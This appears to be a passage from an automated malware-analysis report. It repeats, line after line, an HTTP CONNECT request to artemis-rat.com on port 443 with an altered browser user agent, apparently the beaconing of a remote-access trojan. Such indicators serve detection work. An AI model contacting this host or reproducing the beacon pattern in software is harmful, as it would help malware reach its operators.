                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
